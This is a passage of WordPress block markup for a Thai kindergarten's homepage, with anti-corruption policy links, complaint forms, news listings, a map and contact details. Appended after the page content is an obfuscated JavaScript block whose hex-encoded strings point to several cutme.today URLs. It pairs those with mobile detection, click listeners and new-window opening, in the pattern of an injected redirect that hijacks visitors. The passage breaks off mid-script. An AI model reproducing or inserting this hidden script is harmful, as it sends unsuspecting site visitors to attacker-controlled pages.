{\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 